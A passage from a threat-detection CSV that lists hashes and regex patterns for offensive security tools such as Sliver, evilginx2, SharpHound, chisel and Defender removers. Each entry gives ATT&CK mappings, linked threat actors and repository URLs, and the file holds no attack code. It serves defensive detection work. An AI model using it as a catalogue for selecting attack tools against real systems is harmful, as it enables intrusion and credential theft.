TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44226" "*f8596f9a76761fd67a156dc4ab53652ffdf5e2e7b5bcf82a0902099d41d77fbc*",".{0,1000}f8596f9a76761fd67a156dc4ab53652ffdf5e2e7b5bcf82a0902099d41d77fbc.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","44227" "*f85996adb68f4d1c09f87c896a686530cc08df05aeaaa885756bf4508470ceaf*",".{0,1000}f85996adb68f4d1c09f87c896a686530cc08df05aeaaa885756bf4508470ceaf.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#filehash","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","44228" "*f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928*",".{0,1000}f86331a57befd87e3ea359578a7a8b526d924dd11cf629ce1f24f2626d107928.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44229" "*f868f99f4d8dd6cc691fccb21ceb5cfdf84406bc7718662f62cc191c33a13538*",".{0,1000}f868f99f4d8dd6cc691fccb21ceb5cfdf84406bc7718662f62cc191c33a13538.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44231" "*f87336f0cd0348db4f5054812e538715bdf5f9306ceabb28a0f5763cf24959e9*",".{0,1000}f87336f0cd0348db4f5054812e538715bdf5f9306ceabb28a0f5763cf24959e9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44232" "*f8749220e3a914ff2323237dd52e8ec9fd2634be7b0b4266ef57872ffe29f845*",".{0,1000}f8749220e3a914ff2323237dd52e8ec9fd2634be7b0b4266ef57872ffe29f845.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","44233" "*f8751474732f13b4139d18f33929a7fa88ca7b255455b2fb814fbc1d61ad8a6a*",".{0,1000}f8751474732f13b4139d18f33929a7fa88ca7b255455b2fb814fbc1d61ad8a6a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44234" "*f87f4efe743195b9995c713d8219ee7b495691262a16a200b49ae65f29eecec6*",".{0,1000}f87f4efe743195b9995c713d8219ee7b495691262a16a200b49ae65f29eecec6.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","44235" "*f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5*",".{0,1000}f888e9662215d81edb90112d66c462e3ba47b9007efe21492e9c8d76909836c5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44237" "*f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0*",".{0,1000}f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44238" 
"*f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4*",".{0,1000}f88a7b4bbe98f4e4d0f9e4c2f4de2a448f13ed7783772e6f5d6881c18b324bb4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44240" "*f88dbf4830bbe1e1c4df5d928626e757180857b56bfdc3e01ff6883662c2cc0e*",".{0,1000}f88dbf4830bbe1e1c4df5d928626e757180857b56bfdc3e01ff6883662c2cc0e.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44241" "*f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb*",".{0,1000}f891fa68159f087901b55f0109bdf40a39e312fc31fb9caafca22726798e7aeb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44243" "*f89c94c0952008e38b1da6f73fb2b2802421673db7e57354e6cd5755a47553a7*",".{0,1000}f89c94c0952008e38b1da6f73fb2b2802421673db7e57354e6cd5755a47553a7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44245" "*f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde*",".{0,1000}f89d5657f9c876889a0a1a0b5a7c599819d9cb731c529527af700c464b586bde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44246" "*f8a603588cb91acf4c4a745f74326d202f4d63243fefaf048e1076174a18a50a*",".{0,1000}f8a603588cb91acf4c4a745f74326d202f4d63243fefaf048e1076174a18a50a.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","44247" "*f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45*",".{0,1000}f8a705f52d2b4587dfbf680d12d4b1af6d5ed91872257a756e2d5f4bdee24c45.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44249" "*f8ad55c6c6a80781eb944e9f865a82992f35c79c2ae5c7cf363536efe0e823cd*",".{0,1000}f8ad55c6c6a80781eb944e9f865a82992f35c79c2ae5c7cf363536efe0e823cd.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","44250" "*f8af79bacf239d71ec2fab98d0ac0a9fc908b362b7228a0db33269700640e8ae*",".{0,1000}f8af79bacf239d71ec2fab98d0ac0a9fc908b362b7228a0db33269700640e8ae.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - 
T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44251" "*f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b*",".{0,1000}f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44255" "*f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b*",".{0,1000}f8c05d66a6fda535ef4e8e767c8e3ca5c93a0828ff03498b4b6cbe7e39bb617b.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","44256" "*f8c56ebf28222977e12ef4740c106dd6072e7964688ca2bf80d3cee2ec7edcfd*",".{0,1000}f8c56ebf28222977e12ef4740c106dd6072e7964688ca2bf80d3cee2ec7edcfd.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","44257" "*f8ce37975b71cc8f51fcb93e3e32ec81a9b5da5cead7dcb987d0a3127bde027c*",".{0,1000}f8ce37975b71cc8f51fcb93e3e32ec81a9b5da5cead7dcb987d0a3127bde027c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass 
Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","44259" "*F8D2B9771E5AB15013A38543F05ECD747A23A6A33463D9A53106FDD15DADF002*",".{0,1000}F8D2B9771E5AB15013A38543F05ECD747A23A6A33463D9A53106FDD15DADF002.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44260" "*f8d85258f9c717fb629942c43b2218c96800252c3da18cbbc11839f790acc452*",".{0,1000}f8d85258f9c717fb629942c43b2218c96800252c3da18cbbc11839f790acc452.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","44261" "*f8de181750ece6bfa74bdc2511b695b540a68d3640c245d0839e3a54ceb10347*",".{0,1000}f8de181750ece6bfa74bdc2511b695b540a68d3640c245d0839e3a54ceb10347.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44264" "*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*",".{0,1000}F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","44266" "*f8e1e243c0648d5bfcd2bb529571b4506f26897574537cffbf1399a171746713*",".{0,1000}f8e1e243c0648d5bfcd2bb529571b4506f26897574537cffbf1399a171746713.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","#filehash","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","44267" "*f8f187ad240a6f23403c387c47ac1b3ce77301ff4ea1b3dbd639b76d65ca54ac*",".{0,1000}f8f187ad240a6f23403c387c47ac1b3ce77301ff4ea1b3dbd639b76d65ca54ac.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44269" "*f8f4e6097d1f3accb215891fc2767b4dba429c8a50681ed3179d224beaf01ac0*",".{0,1000}f8f4e6097d1f3accb215891fc2767b4dba429c8a50681ed3179d224beaf01ac0.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","#filehash","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","44270" "*f8fb6472ba4d0cd5bd54881ee9a69a9d5fec9f5b6e40ec1b3850208eb045db56*",".{0,1000}f8fb6472ba4d0cd5bd54881ee9a69a9d5fec9f5b6e40ec1b3850208eb045db56.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44272" "*f8ffdb3b2c1b6172387a0e776a6f400c5117a0e525a3456465e3de4614555c10*",".{0,1000}f8ffdb3b2c1b6172387a0e776a6f400c5117a0e525a3456465e3de4614555c10.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44273" "*F90C57DF-CDE4-4CDE-A2B9-9124C307D53A*",".{0,1000}F90C57DF\-CDE4\-4CDE\-A2B9\-9124C307D53A.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - 
TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","44276" "*f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023*",".{0,1000}f90e3e0ba8b25e863b1d994d088376b2caedeed3b7bb5ee6c3f6e0e89bcaf023.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44277" "*f91025122cd3b0f537db1eac70c44250530f34ea7521750bb4af7ff1c7af3b8c*",".{0,1000}f91025122cd3b0f537db1eac70c44250530f34ea7521750bb4af7ff1c7af3b8c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","44278" "*f9103918917348bf95b972701d8d4ccec36fdfd843792aa705b15454113cdfef*",".{0,1000}f9103918917348bf95b972701d8d4ccec36fdfd843792aa705b15454113cdfef.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","44279" 
"*f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb*",".{0,1000}f91f2c86797c2b92c342f5a9617a14d5de59c05aa1bfeb50c32061789185d6bb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44280" "*f92067d31fb234d9df105d85b053aff4a590270e0f25c6d8e563eda88bc8ba21*",".{0,1000}f92067d31fb234d9df105d85b053aff4a590270e0f25c6d8e563eda88bc8ba21.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44281" "*f9225d9986c9dc0cf328641af9c66eefc10f40c1a344d26bd847a219c88605a5*",".{0,1000}f9225d9986c9dc0cf328641af9c66eefc10f40c1a344d26bd847a219c88605a5.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44282" "*f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc*",".{0,1000}f923e44f1665a3cbae86b73bc2d3dcd74e928a7f358b75bb6dc.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a 
quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","44283" "*f927faa1d716f47708243946ccb6be7c9e4dcfe82ece1b159d63ce412c68d62e*",".{0,1000}f927faa1d716f47708243946ccb6be7c9e4dcfe82ece1b159d63ce412c68d62e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44284" "*f92b1b55d9d3ab4cf2eafed6dfbbac7ff6db4d07d8902cf57e625b6adaf02611*",".{0,1000}f92b1b55d9d3ab4cf2eafed6dfbbac7ff6db4d07d8902cf57e625b6adaf02611.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","44285" "*f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe*",".{0,1000}f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44286" 
"*f93277bd46aec52cc14875cb9439a8ab5f226cf4f857196e2b423391dd67ec93*",".{0,1000}f93277bd46aec52cc14875cb9439a8ab5f226cf4f857196e2b423391dd67ec93.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","44287" "*f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a*",".{0,1000}f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","44288" "*F93C99ED-28C9-48C5-BB90-DD98F18285A6*",".{0,1000}F93C99ED\-28C9\-48C5\-BB90\-DD98F18285A6.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","0","#GUIDproject","N/A","9","6","515","199","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z","44289" "*f945696926267701f5b3327ecb4af54169fd24f780db0f4caecf1fe447848007*",".{0,1000}f945696926267701f5b3327ecb4af54169fd24f780db0f4caecf1fe447848007.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","44291" "*f94889e1ba519e9e4e4e7bbee99f29ee46ab218b45d3a1b49549deba41f083ff*",".{0,1000}f94889e1ba519e9e4e4e7bbee99f29ee46ab218b45d3a1b49549deba41f083ff.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","44292" "*f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52*",".{0,1000}f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
